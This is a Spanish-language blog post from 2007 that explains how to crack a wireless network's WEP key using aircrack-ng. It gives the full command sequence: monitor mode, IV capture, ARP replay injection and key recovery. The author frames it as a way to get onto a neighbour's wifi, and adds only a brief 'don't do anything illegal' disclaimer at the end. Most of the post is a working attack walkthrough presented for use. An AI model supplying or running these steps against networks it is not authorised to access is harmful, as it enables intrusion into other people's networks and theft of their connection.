sábado 29 de diciembre de 2007

¿Se puede pinchar una red inalámbrica con clave WEP?

Gracias a este artículo de SmallNetBuilder sobre WEP Cracking, hoy pude comprobar que se puede crackear la clave WEP (Wired Equivalent Privacy) para conectarse a una red inalámbrica. O dicho para que lo entienda mi abuela, si tu vecino tiene una conexión a Internet por wifi que nunca pudiste usar porque desconocés la clave de acceso WEP, es posible averiguarla sin mayor dificultad.

El único requisito (además de tener una placa de red inalámbrica adecuada y encontrar una red wifi de tales características, con al menos un cliente que se conecte cada tanto), es instalar el paquete aircrack-ng. En Ubuntu Linux, esto se puede hacer desde el gestor Synaptics o con:
sudo apt-get install aircrack-ng

Básicamente los comandos que tuve que correr son:
# PRIMERO: MODO MONITOR
# Para poner el adaptador wireless en modo monitor:
# (ath0 y wifi0 dependen del adaptador)
airmon-ng stop ath0
airmon-ng start wifi0
# SEGUNDO: CAPTURAR PAQUETES
# Para empezar a capturar paquetes de cualquier Access Point (AP) y
# registrar los vectores de inicialización (IVs) necesarios para el cracking:
airodump-ng --ivs --write capturefile ath0
# Con esto se averiguan 3 datos a utilizar luego: Número del canal,
# BSSID del Access Point y BSSID de un cliente asociado.
# Para capturar paquetes sólo del AP deseado:
airodump-ng --ivs --channel [número del canal] --bssid [BSSID del Access Point] --write capturefile ath0
# TERCERO: ACELERAR CAPTURA
# Para acelerar la captura de paquetes generando tráfico ARP:
# (Hay que llegar a muchos #Data, al menos 300.000)
aireplay-ng --arpreplay -b [BSSID del Access Point] -h [BSSID del cliente asociado al AP] ath0
# CUARTO: CRACK
# Una vez registrados suficientes IVs, usarlos para crackear la clave del AP
aircrack-ng -b [BSSID del Access Point] capturefile*.ivs
# Encontrada la clave se puede ingresar como hexadecimal (sin los ":")
# al intentar conectarse a la red wireless en cuestión.

Esto es sólo un resumen para mostrar con sólo 4 comandos del paquete aircrack (y casi ningún conocimiento de redes inalámbricas), se puede crackear la clave WEP del Access Point. Para mayores detalles, recomiendo el artículo que mencioné antes.

Ahora que sabés cómo crackear la clave WEP de una red inalámbrica, no hagas nada ilegal. Este artículo es de interés técnico: Ahora sabés que se puede robar la conexión a una red inalámbrica con clave WEP así como se pincha el teléfono y la televisión por cable.
Publicado por sir shamrock en 14:15
Etiquetas: , , ,
Suscribirse a: Enviar comentarios (Atom)